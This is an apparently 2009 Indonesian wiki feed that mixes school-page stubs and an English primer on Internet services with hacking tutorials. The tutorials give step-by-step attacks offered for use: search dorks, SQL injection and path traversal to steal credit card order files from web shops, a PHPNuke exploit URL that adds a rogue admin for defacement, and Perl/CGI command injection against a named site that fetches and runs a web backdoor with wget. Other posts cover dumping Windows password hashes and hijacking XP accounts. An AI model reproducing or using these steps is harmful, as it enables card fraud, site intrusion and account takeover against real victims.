Cyber World - Recently Updated Pages

other

sang_penguasa — Sat, 04 Apr 2009 02:46:47 CDT

Gudang Soal UKDI

Gudang_Soal_UKDI

sang_penguasa — Sat, 04 Apr 2009 02:46:19 CDT

There is no abstract available for this page revision.

SMA

sang_penguasa — Sat, 04 Apr 2009 02:44:23 CDT

Matematika Diskrit

Matematika Diskrit

sang_penguasa — Sat, 04 Apr 2009 02:42:42 CDT

There is no abstract available for this page revision.

Edukasi

sang_penguasa — Sat, 04 Apr 2009 02:41:30 CDT

Sekolah Dasar
Sekolah Menengah Pertama
Sekolah Menengah Atas
Other

SMP

sang_penguasa — Sat, 04 Apr 2009 02:38:14 CDT

There is no abstract available for this page revision.

SD

sang_penguasa — Sat, 04 Apr 2009 02:37:22 CDT

There is no abstract available for this page revision.

Tutorial

sang_penguasa — Sat, 04 Apr 2009 02:27:33 CDT

1. Cara carding
2. Cara buat bot
3. How to Deface
4. Menjadi Admin
5. Hack User Account Admin WinXP
6. Melacak IP Addreas di Yahoo Mesenger
7. How To Know Admin Password
8. Exploitasi Command Execution di PERL / CGI
9. Deface Situs PHPNuke
10. A Basic Guide to the Internet

Kalau kamu butuh script r57, c99, dll tinggal download aja di http://www.geocities.com/pendik1985/Files

A Basic Guide to the Internet

sang_penguasa — Sat, 04 Apr 2009 02:25:51 CDT

The Internet is a computer network made up of thousands of networks worldwide. No one knows exactly how many computers are connected to the Internet. It is certain, however, that these number in the millions.

No one is in charge of the Internet. There are organizations which develop technical aspects of this network and set standards for creating applications on it, but no governing body is in control. The Internet backbone, through which Internet traffic flows, is owned by private companies.

All computers on the Internet communicate with one another using the Transmission Control Protocol/Internet Protocol suite, abbreviated to TCP/IP. Computers on the Internet use a client/server architecture. This means that the remote server machine provides files and services to the user's local client machine. Software can be installed on a client computer to take advantage of the latest access technology.

An Internet user has access to a wide variety of services: electronic mail, file transfer, vast information resources, interest group membership, interactive collaboration, multimedia displays, real-time broadcasting, shopping opportunities, breaking news, and much more.

The Internet consists primarily of a variety of access protocols. Many of these protocols feature programs that allow users to search for and retrieve material made available by the protocol.

--------------------------------------------------------------------------------

COMPONENTS OF THE INTERNET

--------------------------------------------------------------------------------

WORLD WIDE WEB
The World Wide Web (abbreviated as the Web or WWW) is a system of Internet servers that supports hypertext to access several Internet protocols on a single interface. Almost every protocol type available on the Internet is accessible on the Web. This includes e-mail, FTP, Telnet, and Usenet News. In addition to these, the World Wide Web has its own protocol: HyperText Transfer Protocol, or HTTP. These protocols will be explained later in this document.

The World Wide Web provides a single interface for accessing all these protocols. This creates a convenient and user-friendly environment. It is no longer necessary to be conversant in these protocols within separate, command-level environments. The Web gathers together these protocols into a single system. Because of this feature, and because of the Web's ability to work with multimedia and advanced programming languages, the Web is the fastest-growing component of the Internet.

The operation of the Web relies primarily on hypertext as its means of information retrieval. HyperText is a document containing words that connect to other documents. These words are called links and are selectable by the user. A single hypertext document can contain links to many documents. In the context of the Web, words or graphics may serve as links to other documents, images, video, and sound. Links may or may not follow a logical path, as each connection is programmed by the creator of the source document. Overall, the Web contains a complex virtual web of connections among a vast number of documents, graphics, videos, and sounds.

Producing hypertext for the Web is accomplished by creating documents with a language called HyperText Markup Language, or HTML. With HTML, tags are placed within the text to accomplish document formatting, visual features such as font size, italics and bold, and the creation of hypertext links. Graphics and multimedia may also be incorporated into an HTML document. HTML is an evolving language, with new tags being added as each upgrade of the language is developed and released. The World Wide Web Consortium (W3C), led by Web founder Tim Berners-Lee, coordinates the efforts of standardizing HTML. The W3C now calls the language XHTML and considers it to be an application of the XML language standard.

The World Wide Web consists of files, called pages or home pages, containing links to documents and resources throughout the Internet.

The Web provides a vast array of experiences including multimedia presentations, real-time collaboration, interactive pages, radio and television broadcasts, and the automatic "push" of information to a client computer. Programming languages such as Java, JavaScript, Visual Basic, Cold Fusion and XML are extending the capabilities of the Web. A growing amount of information on the Web is served dynamically from content stored in databases. The Web is therefore not a fixed entity, but one that is in a constant state of development and flux.

For more complete information about the World Wide Web, see Understanding The World Wide Web.

E-MAIL
Electronic mail, or e-mail, allows computer users locally and worldwide to exchange messages. Each user of e-mail has a mailbox address to which messages are sent. Messages sent through e-mail can arrive within a matter of seconds.

A powerful aspect of e-mail is the option to send electronic files to a person's e-mail address. Non-ASCII files, known as binary files, may be attached to e-mail messages. These files are referred to as MIME attachments.MIME stands for Multimedia Internet Mail Extension, and was developed to help e-mail software handle a variety of file types. For example, a document created in Microsoft Word can be attached to an e-mail message and retrieved by the recipient with the appropriate e-mail program. Many e-mail programs, including Eudora, Netscape Messenger, and Microsoft Outlook, offer the ability to read files written in HTML, which is itself a MIME type.

TELNET
Telnet is a program that allows you to log into computers on the Internet and use online databases, library catalogs, chat services, and more. There are no graphics in Telnet sessions, just text. To Telnet to a computer, you must know its address. This can consist of words (locis.loc.gov) or numbers (140.147.254.3). Some services require you to connect to a specific port on the remote computer. In this case, type the port number after the Internet address. Example: telnet nri.reston.va.us 185.

Telnet is available on the World Wide Web. Probably the most common Web-based resources available through Telnet have been library catalogs, though most catalogs have since migrated to the Web. A link to a Telnet resource may look like any other link, but it will launch a Telnet session to make the connection. A Telnet program must be installed on your local computer and configured to your Web browser in order to work.

With the increasing popularity of the Web, Telnet has become less frequently used as a means of access to information on the Internet.

FTP
FTP stands for File Transfer Protocol. This is both a program and the method used to transfer files between computers. Anonymous FTP is an option that allows users to transfer files from thousands of host computers on the Internet to their personal computer account. FTP sites contain books, articles, software, games, images, sounds, multimedia, course work, data sets, and more.

If your computer is directly connected to the Internet via an Ethernet cable, you can use one of several PC software programs, such as WS_FTP for Windows, to conduct a file transfer.

FTP transfers can be performed on the World Wide Web without the need for special software. In this case, the Web browser will suffice. Whenever you download software from a Web site to your local machine, you are using FTP. You can also retrieve FTP files via search engines such as FtpFind, located at /http://www.ftpfind.com/. This option is easiest because you do not need to know FTP program commands.

E-MAIL DISCUSSION GROUPS
One of the benefits of the Internet is the opportunity it offers to people worldwide to communicate via e-mail. The Internet is home to a large community of individuals who carry out active discussions organized around topic-oriented forums distributed by e-mail. These are administered by software programs. Probably the most common program is the listserv.

A great variety of topics are covered by listservs, many of them academic in nature. When you subscribe to a listserv, messages from other subscribers are automatically sent to your electronic mailbox. You subscribe to a listserv by sending an e-mail message to a computer program called a listserver. Listservers are located on computer networks throughout the world. This program handles subscription information and distributes messages to and from subscribers. You must have a e-mail account to participate in a listserv discussion group. Visit Tile.net at /http://tile.net/ to see an example of a site that offers a searchablecollection of e-mail discussion groups.

Majordomo and Listproc are two other programs that administer e-mail discussion groups. The commands for subscribing to and managing your list memberships are similar to those of listserv.

USENET NEWS
Usenet News is a global electronic bulletin board system in which millions of computer users exchange information on a vast range of topics. The major difference between Usenet News and e-mail discussion groups is the fact that Usenet messages are stored on central computers, and users must connect to these computers to read or download the messages posted to these groups. This is distinct from e-mail distribution, in which messages arrive in the electronic mailboxes of each list member.

Usenet itself is a set of machines that exchanges messages, or articles, from Usenet discussion forums, called newsgroups. Usenet administrators control their own sites, and decide which (if any) newsgroups to sponsor and which remote newsgroups to allow into the system.

There are thousands of Usenet newsgroups in existence. While many are academic in nature, numerous newsgroups are organized around recreational topics. Much serious computer-related work takes place in Usenet discussions. A small number of e-mail discussion groups also exist as Usenet newsgroups.

The Usenet newsfeed can be read by a variety of newsreader software programs. For example, the Netscape suite comes with a newsreader program called Messenger. Newsreaders are also available as standalone products.

FAQ, RFC, FYI
FAQ stands for Frequently Asked Questions. These are periodic postings to Usenet newsgroups that contain a wealth of information related to the topic of the newsgroup. Many FAQs are quite extensive. FAQs are available by subscribing to individual Usenet newsgroups. A Web-based collection of FAQ resources has been collected by The Internet FAQ Consortium and is available at /http://www.faqs.org/.

RFC stands for Request for Comments. These are documents created by and distributed to the Internet community to help define the nuts and bolts of the Internet. They contain both technical specifications and general information.

FYI stands for For Your Information. These notes are a subset of RFCs and contain information of interest to new Internet users.

Links to indexes of all three of these information resources are available on the University Libraries Web site at /http://library.albany.edu/reference/faqs.html.

CHAT & INSTANT MESSENGING
Chat programs allow users on the Internet to communicate with each other by typing in real time. They are sometimes included as a feature of a Web site, where users can log into the "chat room" to exchange comments and information about the topics addressed on the site. Chat may take other, more wide-ranging forms. For example, America Online is well known for sponsoring a number of topical chat rooms.

Internet Relay Chat (IRC) is a service through which participants can communicate to each other on hundreds of channels. These channels are usually based on specific topics. While many topics are frivolous, substantive conversations are also taking place. To access IRC, you must use an IRC software program.

A variation of chat is the phenomenon of instant messenging. With instant messenging, a user on the Web can contact another user currently logged in and type a conversation. Most famous is America Online's Instant Messenger. ICQ, MSN and Yahoo are other commonly-used chat programs.

Other types of real-time communication are addressed in the tutorial Understanding the World Wide Web.

MUD/MUSH/MOO/MUCK/DUM/MUSE
MUD stands for Multi User Dimension. MUDs, and their variations listed above, are multi-user virtual reality games based on simulated worlds. Traditionally text based, graphical MUDs now exist. There are MUDs of all kinds on the Internet, and many can be joined free of charge. For more information, read one of the FAQs devoted to MUDs available at the FAQ site at

Musik, mp3

sang_penguasa — Sat, 04 Apr 2009 02:21:36 CDT

There is no abstract available for this page revision.

dunia cyber

sang_penguasa — Sat, 04 Apr 2009 02:16:23 CDT

Daftar Proxy

sang_penguasa — Sat, 04 Apr 2009 02:06:58 CDT

There is no abstract available for this page revision.

software

sang_penguasa — Sat, 04 Apr 2009 02:04:02 CDT

There is no abstract available for this page revision.

sang_penguasa — Sat, 04 Apr 2009 01:53:06 CDT

Cara carding

efriz — Sat, 20 Oct 2007 09:07:59 CDT

sebelumnya, maaf jika ada pertanyaan lebih lanjut dimohon cari sendiri solusinya, ini hanya sekedar informasi.
1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target :www.(sasaran).com/shopadmin.asp

Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1
2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target:www.(sasaran).com/cgi-bin/store/index.cgi?page=short_blue.htm

Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya: www.(sasaran).com/cgi-bin/store/index.cgi?page=../admin/files/order.log
3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com allinurl:/metacart/
Contoh target : www.(sasaran).com/metacart/about.asp

Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya :www.(sasaran).com/metacart/database/metacart.mdb 4. contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.(sasaran).com/xxxx/DCShop/xxxx

Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.(sasaran).com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.(sasaran).com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/dbsetup.asp

Hasilnya : www.(sasaran).com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb

Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.(sasaran).com/data/pdshoppro.mdb

Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google : Ketik –> allinurl:/commercesql/
Contoh : www.(sasaran).com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –> cgi-bin/commercesql/index.cgi?page=

Hasilnya : www.(sasaran).com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –> www.(sasaran).com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

Untuk melihat admin manager –> www.(sasaran).com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

Untuk melihat file log/CCnya –> www.(sasaran).com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…
7. contoh bugs pada bentuk toko sistem : EShop contoh toko akan muncul di search
engine bila mengetikan beberapa
keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.(sasaran).com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.(sasaran).com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.(sasaran).net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di
site tsb. terdapat file berisi data cc Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.(sasaran).net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi,
dengan format
http://www.(sasaran).com/cart32/
Contoh http://www.(sasaran).net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh : http://(sasaran).com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%…,

fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin

Untuk login admin ke http://(sasaran).com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6 Untuk login admin, ada di http://(sasaran)/vpasp/shopadmin.asp
11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.(sasaran).com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.(sasaran).com/fpdb/shop.mdb
12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.(sasaran).com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.(sasaran).com/cgi-local/shopper.cgi?preadd=action&key=…&template…
13. contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.(sasaran).org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb

Hasilnya : www.(sasaran).org/fpdb/vsproducts.mdb
14. contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti:
google Ketik –> inurl:"/cart.php?m="
Contoh : http://(sasaran).com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://(sasaran).com/store/admin
Trus masukin username sama pass nya pake statment SQL injection Usename : ‘or"="
Password : ‘or"="

Deface situs PHPNuke

kuere — Fri, 28 Sep 2007 16:00:38 CDT

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. www.target.com/nuke/index.php atau www.target.com/phpnuke/index.php
2. www.target.com/nuke/admin.php => yg diatas tadi dirubah menjadi admin.php
3. Masukkan bug ini di belakang situs tadi :
?op=AddAuthor&add_aid=J4mbi&add_name=God&add_pwd=H4ck3r&add_email=
king_burger@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Misalnya : www.target.com/nuke/admin.php?op=AddAuthor&add_aid=J4mbi&add_name=God&add_pwd=H4ck3r&add_
email=king_burger@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjoxKalo nggak mau berarti situs tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing muncul www.target.com/nuke/admin.php?op=mod_author
5. Masukin id & password tadi. Masih ingat kan ? lihat yg di atas tadi !
username : J4mbi
password : H4ck3r
6. Kalo udah masuk ke "Administration Menu" situs tsb. Berarti kamu udah mengusai situs tsb skrg.
Skrg kamu pilih gambar Handphone (dibawahnya ada tulisan Messages).
Kolom Title : Hacked by namanickkamu
Kolom Content : Path your web !!!<br>Hey admin.......do you a need help ?<br>Matrix.Dal.Net - #Jambihackerlink
<br><br><img src="http://www.finagro.gov.co/902.gif">
Kolom Expiration : Unlimited
Trus klik tab Add Messages yg ada dibawah.
7. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : www.target.com/nuke/index.php atau www.target.com/phpnuke/index.php. Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.

Sumber :
- jambihackerlink.tk

EXPLOITASI COMMAND EXECUTION DI PERL / CGI

kuere — Fri, 28 Sep 2007 15:37:38 CDT

Disini nggak akan dijelaskan mengapa command execution ini bisa terjadi,
Kalo ingin mengcari tahu, silahkan mencari di google dan baca …
So, Kita langsung ajah….

SATU :
Mencari Target…
1. Buka Opera, internet explorer, mozilla dll
2. Masukkan alamat www.google.com di address bar
3. Masukkan keyword pencarian.
Catatan :
Trick menggunakan keyword dalam mencari bug cgi / perl :
a. Gunakan words / kata2 yang mengarah secara langsung pada hal yang akan kita cari
b. Gunakan key “allinurl:”
c. Gunakan tanda petik ganda (“) jika diperlukan
contoh 1:
allinurl: “news.cgi?news=” txt
Ini akan mencari semua url yang mengandung url news.cgi?news=, dan file yang akan
Di buka yakni file dengan ektensi txt.
Contoh 2 :
allinurl: cgi action dat
ini akan mencari semua url yang ada kata cgi, action dan dat, jadi biasanya url yang
didapat adalah url yang mangandung file dengan akhiran .cgi ato .pl diikuti dengan
parameter action dan membuka file dengan ektensi dat.
(dengan key inilah bug WPS_SHOPPING ditemukan).
4. Oke sekarang kita telah memasukkan keyword yang kita inginkan. Dalam contoh ini
kita akan mengunakan keyword = allinurl: cgi action file dat -> lalu klick cari/search
dan hasilnya ………………………………………..:

DUA:
Exploitasi:

1. Sekarang kita masuk ke exploitasi :
Dalam exploitasi cgi/perl sangat mudah sekali. Yakni kita hanya memerlukan dua
Karackter penting yaitu ‘|’ dan ‘;’ yang di letakkan pada tempat nama file yang akan
dibuka.
Sebagai contoh:
Sekarang kita lihat url pada halaman pertama, yakni :
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat&page=0
Klick kanan url tersebut dan klick open in new window.
Setelah terbuka alamat url tersebut, Sekarang kita tambahkan character penting
tersebut diatas, yakni pipe ‘|’. Pada akhir nama file yang akan dibuka yakni :
file=.file0011.dat|ls|
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|ls|&page=0
(ls dalam command di linux shell adalah sama dengan dir pada windows, yakni
melihat seluruh file directory aktif)
yupe, sekarang kita bisa melihat pada tampilan halaman, ada perubahan tampilan,
yakni disitu terlihat yang semula berisi huruf2 jepang, sekarang ada tulisan file. Itu
artinya webserver tersebut vulnerable untuk di hack…!!!!
Catatan: Tidak semua file cgi yang vulnerable ketika kita tambahkan char ‘|ls|’
Akan menampilkan file2-nya di browser. Ada yang tidak terlihat dan ada yang terlihat.
Yupe, sekarang coba kita lihat id kita:
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|id|&page=0
hasilnya : uid = bla bla bla
Asal uid bukan nobody, maka kita nggak akan kesulitan untuk langkah selanjutnya.

2. Memasukkan backdoor. (web backdoor)
Kita bisa memasukkan beberapa jenis backdoor seperti bindtty dll............
Kenapa saya memilih web backdoor..??? karena web backdoor ini merupakan
Backdoor yang sangat ampuh (menurut saya). Sulit di deteksi (apalagi kalo pake
penyamaran nama file yang bener2 ok)
Tidak terpengaruh oleh firewall dan admin web pada saat mengecek koneksi yang
terjadi pada web-nya, yang mereka tau adalah kita hanya seperti browsing biasa.
Karena kita melakukannya lewat port 80….!!!
Saya menggunakan backdoor dari "http://www.rohitab.com/cgiscripts/cgitelnet.txt"
Baik sekarang kita akan melakukan uploading backdoor tersebut ke web target.
Dalam mengupload backdoor, kita akan menggunakan command wget. Yakni
command di linux yang khusus untuk download ke web server.
Catatan :
Tidak semua server menginstall wget, dan jika itu terjadi, maka pilihan kita selanjutnya
Adalah menggunakan lwp-download, fasilitas download dari perl.

Contoh : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|wget http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
Kita mengambil cgitelnet.txt dari http://www.rohitab.com/cgiscripts/cgitelnet.txt,
Yang selanjutnya akan di save di http://www.mikazo.net/cgiscript/sample/zdiary/
Sekarang kita check apakah kita berhasil ato tidak.
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt
jika ada pesan error file not found, berarti kita gagal menggunakan wget, selanjutnya
kita coba alternatif kedua : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|lwp-download http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
sekarang kita chek lagi :
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt
Yupe sekarang ada tampilan source dari cgitelnet.txt.
Selamat berhasil….!!!! :P~
Baik sekarang apa selanjutnya..???
Selanjutnya adalah kita harus merubah nama cgitelnet.txt ke cgitelnet.cgi dan merubah
Chmod-nya ke 755 agar kita bisa mengexekusi-nya.
a. Merubah nama cgitelnet.txt ke cgitelnet.cgi
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|mv cgitelnet.txt cgitelnet.cgi|&page=0
b. Merubah chmod ke 755
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|chmod 755 cgitelnet.cgi|&page=0

TIGA :
Execkusi backdoor dan selancar di system target

Oke, sekarang kita telah berhasil memasukkan backdoor ke web target. Sekarang coba
kita exekusi:
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.cgi
tampilan yang muncul adalah :
login: admin
password: enter

baik sekarang kita masukkan password. Password = changeme
daaaannn…. Hasilnya adalah :

[admin@www.mikazo.net /home/s20144-1/public_html/cgiscript/sample/zdiary]$

selesai….!!!!!

Oke, sekarang info:
Pada contoh di atas, saya menggunakan bug pada zdiary.cgi.
zdiary v1.51, v1.52 (all version) by mikazo
untuk mencari webserver yang menginstall zdiary, gunakan key word pada google
sebagai berikut :
allinurl: “zdiary.cgi”

selamat mencoba

Melacak Ip dr YM

kuere — Fri, 28 Sep 2007 15:30:22 CDT

Banyak para Newbie tidak tahu cara menampilkan ip addreas teman chatnya di
Yahoo Messenger, AOL dan lainnya, memang untuk melakukannya kita butuh
triks, berbeda dengan IRC yang tinggal di whois aja, baik langsung saja kita
memulai tutorialnya, pertama-tama kirimkankan file apa saja yang anda punya
ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar anda
punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas
teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena
itu akan menyebabkan waktu anda lebih banyak.
Segera buka MS-DOS anda, lalu ketikkan netstat -n lalu akan tampil ip teman
chat anda, misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 :
5000+++ ->> ip ini ( 202.133.80.45) ternyata setelah dicek itu milik Graha
Net, nah ahkirnya ketahuan tuh si pemakai messenger di warnet mana, nah
kalau 5000+ itu adalah portnya yang dikirimin file ama anda.
Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa
penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya,
sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda
berselancar di internet jika anda benar-benar ingin mengurangi resiko dari
berbagai jenis pelacakan.
2. Cara masuk ke DOS pada Windows XP yang serba dikunci Banyak warnet yang
membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows
Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh,
emang nyebelin kalo kita bener-bener perlu akses ini Gue punya jawaban

How To Know Password Admin

kuere — Fri, 28 Sep 2007 15:29:19 CDT

Download Proactive Windows Security Explorer<http://www.crackpassword.com/download/pwsex.zip>
Sebenarnya cara ini sudah diketahui gue sudah lama, tapi gue belum
mempublikasikannya kepada rekan-rekan, publikasi cara ini juga baru terpikir
saat tutorial program LanDiscovery diluncurkan, baiklah kita langsung saja,
pertama-tama downloadlah program Proactive Windows Security Explorer.
Pilih Retrive password hashes from, misal Registry of local computer. lalu
kita klik Dump, maka password-password administrator Windows akan muncul
dibawahnya, & jika program ini tidak dapat memuaskan anda, maka anda dapat
menggunakan program Password Reminder v1.1 dimana tutorialnya juga ada
dihalaman ini.
Tujuan dari tutorial ini adalah untuk menginformasikan bagi para pemilik
komputer dengan system operasi Windows NT / 2000 / XP agar lebih hati-hati
dengan para pengguna program recovery password administrator Windows seperti
ini karena mereka dapat mengakali seluruh komputer anda.

Hack account win xp

kuere — Fri, 28 Sep 2007 15:21:41 CDT

pertama buka kmputer anda.
Pada saat tampilan menu login, tekan Ctrl - Alt - Del dua kali.
Maka akan muncul login form.
Disitu user name di isi dengan nama : Administrator
Password tidak perlu diisi. Tekan enter.
Jika anda berhasil login, maka kemungkinan sukses tinggi sekali.
Jika sukses, maka status anda adalah sebagai Administrator. Tetapi biasanya (by default) Administrator tidak bisa akses document user - user.

Setelah itu coba anda buka command prompt.
Disitu ketik:
AT 8:01am /interactive cmd.exe

Note : 8:01am diganti dengan waktu anda sekarang, tetapi ditambah 1-2 menit.
Perintah diatas akan memanggil program cmd.exe, namun ownernya adalah system. Dengan kata lain, kita dapat mengganti password semua user di komputer itu.
Setelah command prompt yang kita panggil lewat AT tadi muncul, maka disitu ketik command line ini :
NET USER namauserutama passwordbaru

Sukses.
Sekarang coba log off, dan login ke account user yang anda hack tadi dengan password baru yang anda save. Selesai.

Jika cara tersebut tidak sukses, untung lebih mudah, anda download saja opchrack. (http://ophcrack.sourceforge.net/ )

Semoga bisa membantu.
Note : Cara ini saya dapatkan dari hacker not cracker

Cyber World - Recently Updated Pages

other

Gudang_Soal_UKDI

SMA

Matematika Diskrit

Edukasi

SMP

SD

Tutorial

A Basic Guide to the Internet

Musik, mp3

dunia cyber

Daftar Proxy

software

share

Cara carding

Deface situs PHPNuke

EXPLOITASI COMMAND EXECUTION DI PERL / CGI

Melacak Ip dr YM

How To Know Password Admin

Hack account win xp